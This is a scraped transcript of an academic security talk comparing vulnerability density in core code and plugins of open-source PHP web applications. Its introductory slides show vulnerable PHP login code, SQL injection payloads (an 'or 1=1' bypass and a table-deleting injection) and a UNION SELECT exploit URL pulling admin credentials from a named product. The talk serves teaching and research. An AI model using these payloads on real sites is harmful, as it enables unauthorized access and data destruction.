Presentation is loading. Please wait.

Presentation is loading. Please wait.

James Walden, Maureen Doyle Northern Kentucky University Students: Andrew Plunkett, Rob Lenhof, John Murray.

Published by Modified over 9 years ago

Similar presentations

Presentation on theme: "James Walden, Maureen Doyle Northern Kentucky University Students: Andrew Plunkett, Rob Lenhof, John Murray."— Presentation transcript:

1 James Walden, Maureen Doyle Northern Kentucky University Students: Andrew Plunkett, Rob Lenhof, John Murray

2 1. Web Application Security 2. Plugins 3. Plugin Vulnerabilities 4. Comparing Core and Plugin Security 5. Vulnerabilities by Category 6. Conclusions IMI Security Symposium 20102

3 3

4 4

5 Firewall Port 80 HTTP Traffic Web Client Web Server Application Database Server telnet ftp 5

6 YearTechnologySecurity 1993CGIFirewalls, SSL 1995PHP, JavascriptFirewalls, SSL 1997ASP, JSPFirewalls, SSL 2000REST, SOAFirewalls, SSL 2006AJAXFirewalls, SSL IMI Security Symposium 20106

7 7

8 8

9 1. App sends form to user. 2. Attacker submits form with SQL exploit data. 3. Application builds string with exploit data. 4. Application sends SQL query to DB. 5. DB executes query, including exploit, sends data back to application. 6. Application returns data to user. Attacker Web Server DB Server Firewall User Pass ‘ or 1=1-- 9

10 IMI Security Symposium 2010 $link = mysql_connect($DB_HOST, $DB_USERNAME, $DB_PASSWORD) or die ("Couldn't connect: ". mysql_error()); mysql_select_db($DB_DATABASE); $query = "select count(*) from users where username = '$username' and password = '$password'"; $result = mysql_query($query); 10

11 IMI Security Symposium 2010 Unauthorized Access Attempt: password = ’ or 1=1 -- SQL statement becomes: select count(*) from users where username = ‘user’ and password = ‘’ or 1=1 -- Checks if password is empty OR 1=1, which is always true, permitting access. 11

12 IMI Security Symposium 2010 Database Modification Attack: password = foo’; delete from table users where username like ‘% DB executes two SQL statements: select count(*) from users where username = ‘user’ and password = ‘foo’ delete from table users where username like ‘%’ 12

13 IMI Security Symposium 2010 http://www.xkcd.com/327/ 13

14 IMI Security Symposium 2010 www.website.com/fullnews.php?id=- 1/**/UNION/**/ALL/**/SELECT/**/1,2,concat(username, char(58),password),4,5/**/FROM/**/admin/* Exploit against http://phprealestatescript.com/ 14

15 IMI Security Symposium 2010 Attacker causes a legitimate web server to send user executable content (Javascript, Flash ActiveScript) of attacker’s choosing. XSS used to obtain session ID for ◦ Bank site (transfer money to attacker) ◦ Shopping site (buy goods for attacker) ◦ E-mail Key ideas ◦ Attacker sends malicious code to server. ◦ Victim’s browser loads code from server and runs it. 15

16 IMI Security Symposium 2010 1. Login 2. Cookie Web Server 3. XSS Attack Attacker User 4. User clicks on XSS link. 5. XSS URL 7. Browser runs injected code. Evil site saves ID. 8. Attacker hijacks user session. 6. Page with injected code. 16

17 Are Individual Web Apps Worsening? IMI Security Symposium 201017

18 IMI Security Symposium 201018

19 Add features to apps:  Advertising  E-commerce  Media  Security  Site Navigation  Statistics  Themes  User Management IMI Security Symposium 201019

20 Is it the core code or core code + plugins?  Some apps are almost always deployed with plugins.  Plugins are written by non-core developers.  Core site may or may not track plugin security. Some apps are packaged in distributions with plugins such as Drupal which has:  OpenAtrium (Development Seed)  Acquia Drupal  OpenPublish  Pressflow (Four Kitchens) IMI Security Symposium 201020

21 Research Objective Goal: Identify differences between security of core code and plugins for web applications. Research questions: 1.Are plugins less secure than core code? 2.How are vulnerabilities distributed across plugins? 3.How do different applications compare in terms of plugin security? IMI Security Symposium 201021

22 Open Source ◦ Evaluate source code that has no barriers to access ◦ 85% of businesses use open source software ◦ Probably all if embedded open source is counted, such as printers, routers, projectors, etc. PHP is most widely used language for OS web ◦ 35.3% of web apps on Freshmeat are PHP, 14% Java ◦ Most popular apps written in PHP: Drupal, Joomla, Mediawiki, phpBB, PhpMyAdmin, WordPress IMI Security Symposium 201022

23 IMI Security Symposium 201023

24 Open Source Web Applications Selection process  PHP web applications from freshmeat.net.  A central plugin repository.  Automatable downloads.  At least 10 plugins. Why PHP?  Most popular web applications written in PHP.  Can compare applications evenly. Range of projects  12 projects met selection criteria.  13,535 plugins for these applications.  Plugins per app ranged from 10 to 8989 plugins. IMI Security Symposium 201024

25 Reported Vulnerabilities in NVD or OSVDNVD OSVD ◦ Coarse-grained time evolution. ◦ Difficult to correlate with revision. ◦ Undercounts actual vulnerabilities. Dynamic Analysis ◦ Expensive. ◦ False positives and negatives. ◦ Must install and execute application. Static Analysis ◦ Expensive. ◦ False positives and negatives. ◦ Requires application installation IMI Security Symposium 201025

26 IMI Security Symposium 201026

27 IMI Security Symposium 201027

28 IMI Security Symposium 201028

29 Number of vulnerabilities found by a static analysis tool per 1000 lines of source code.  Fortify SourceAnalyzer 5.8.0 Aggregate SAVD  Use aggregate of source code for all plugins.  Total vulnerabilities / Total KSLOC Average SAVD  Compute SAVD for each plugin individually.  Average individual plugin SAVD values. IMI Security Symposium 201029

30 IMI Security Symposium 201030

31 Core code developed by small core team.  Team experienced with core code over years.  May or may not be paid full-time developers.  Most sites have some form of security information. Plugins developed by many people.  Wide variety of programming experience.  Few develop more than one plugin and so have little experience with application compared to core team.  Few plugins mention security unless a vulnerability has been previously reported. IMI Security Symposium 201031

32 IMI Security Symposium 201032

33  Drupal tracked both core and plugin vulns since 2006.  Most popular CMS with 1.58% of web sites including whitehouse.gov www.drupalsecurityreport.org  Secure coding documentation.  XSS Filter API.  DB API to handle SQLi attacks.  Input validation API. IMI Security Symposium 201033

34 IMI Security Symposium 201034

35 IMI Security Symposium 201035

36 Mapped SCA categories to OWASP Top 10 2010. ◦ SCA 5.8 reports 73 categories, only 25 in this code. ◦ 18 of 25 categories mapped to 5 of OWASP Top 10. ◦ 7 remaining categories did not map to Top 10. IMI Security Symposium 201036

37 IMI Security Symposium 201037

38 www.drupalsecurityreport.org IMI Security Symposium 201038

39 IMI Security Symposium 201039

40 Conclusions Plugins slightly less secure than core.  Plugins made up 91% of 11.7 MLOC.  Contained 92% of 135,907 vulnerabilities. Plugin SAVD correlates with code size.  ρ = 0.91 (strong correlation)  Larger plugins are more likely to have vulnerabilities. Core SAVD does not correlate w/ code size. IMI Security Symposium 201040

41 IMI Security Symposium 201041

42 20062008 IMI Security Symposium 201042

43 IMI Security Symposium 201043

44 IMI Security Symposium 201044

45 IMI Security Symposium 201045

46 IMI Security Symposium 201046

47 IMI Security Symposium 201047

Download ppt "James Walden, Maureen Doyle Northern Kentucky University Students: Andrew Plunkett, Rob Lenhof, John Murray."

Similar presentations

Incident Handling & Log Analysis in a Web Driven World Manindra Kishore.

Incident Handling & Log Analysis in a Web Driven World Manindra Kishore.
1.  Understanding about How to Working with Server Side Scripting using PHP Framework (CodeIgniter) 2.

1.  Understanding about How to Working with Server Side Scripting using PHP Framework (CodeIgniter) 2.
OWASP WEBGOAT Alaa Darabseh Department of Computer Science

OWASP WEBGOAT Alaa Darabseh Department of Computer Science
Cross Site Scripting a.k.a. XSS Szymon Siewior. Disclaimer Everything that will be shown, was created for strictly educational purposes. You may reuse.

Cross Site Scripting a.k.a. XSS Szymon Siewior. Disclaimer Everything that will be shown, was created for strictly educational purposes. You may reuse.
By Brian Vees.  SQL Injection  Username Enumeration  Cross Site Scripting (XSS)  Remote Code Execution  String Formatting Vulnerabilities.

By Brian Vees.  SQL Injection  Username Enumeration  Cross Site Scripting (XSS)  Remote Code Execution  String Formatting Vulnerabilities.
Server-Side vs. Client-Side Scripting Languages

Server-Side vs. Client-Side Scripting Languages
INTERNET DATABASE Chapter 9. u Basics of Internet, Web, HTTP, HTML, URLs. u Advantages and disadvantages of Web as a database platform. u Approaches for.

INTERNET DATABASE Chapter 9. u Basics of Internet, Web, HTTP, HTML, URLs. u Advantages and disadvantages of Web as a database platform. u Approaches for.
INTERNET DATABASE. Internet and E-commerce Internet – a worldwide collection of interconnected computer network Internet – a worldwide collection of interconnected.

INTERNET DATABASE. Internet and E-commerce Internet – a worldwide collection of interconnected computer network Internet – a worldwide collection of interconnected.
Sara SartoliAkbar Siami Namin NSF-SFS workshop July 14-18, 2014.

Sara SartoliAkbar Siami Namin NSF-SFS workshop July 14-18, 2014.
1 IS 2150 / TEL 2810 Introduction to Security James Joshi Associate Professor, SIS Lecture 12.1 Nov 20, 2012 SQL Injection Cross-Site Scripting.

1 IS 2150 / TEL 2810 Introduction to Security James Joshi Associate Professor, SIS Lecture 12.1 Nov 20, 2012 SQL Injection Cross-Site Scripting.
SJSU CS157B Dr. Lee1  2004 Jenny Mitchell Two Useful Tools You Can’t Live Without by Jenny Mitchell SJSU CS157B Section 1 09-21-04 PHP and MySQL.

SJSU CS157B Dr. Lee1  2004 Jenny Mitchell Two Useful Tools You Can’t Live Without by Jenny Mitchell SJSU CS157B Section PHP and MySQL.
CSCI 6962: Server-side Design and Programming Course Introduction and Overview.

CSCI 6962: Server-side Design and Programming Course Introduction and Overview.
CSCI 6962: Server-side Design and Programming Secure Web Programming.

CSCI 6962: Server-side Design and Programming Secure Web Programming.
Lecture 14 – Web Security SFDV3011 – Advanced Web Development 1.

Lecture 14 – Web Security SFDV3011 – Advanced Web Development 1.
Ladd Van Tol Senior Software Engineer Security on the Web Part One - Vulnerabilities.

Ladd Van Tol Senior Software Engineer Security on the Web Part One - Vulnerabilities.
1 All Your iFRAMEs Point to Us Mike Burry. 2 Drive-by downloads Malicious code (typically Javascript) Downloaded without user interaction (automatic),

1 All Your iFRAMEs Point to Us Mike Burry. 2 Drive-by downloads Malicious code (typically Javascript) Downloaded without user interaction (automatic),
1-Vulnerabilities 2-Hackers 3-Categories of attacks 4-What a malicious hacker do? 5-Security mechanisms 6-HTTP Web Servers 7-Web applications attacks.

1-Vulnerabilities 2-Hackers 3-Categories of attacks 4-What a malicious hacker do? 5-Security mechanisms 6-HTTP Web Servers 7-Web applications attacks.
March 4, 2008 ISACA Web Application Security James Walden Northern Kentucky University

March 4, 2008 ISACA Web Application Security James Walden Northern Kentucky University
Penetration Testing James Walden Northern Kentucky University.

Penetration Testing James Walden Northern Kentucky University.
November 13, 2008 Ohio Information Security Forum Attack Surface of Web Applications James Walden Northern Kentucky University

November 13, 2008 Ohio Information Security Forum Attack Surface of Web Applications James Walden Northern Kentucky University

Similar presentations

Ads by Google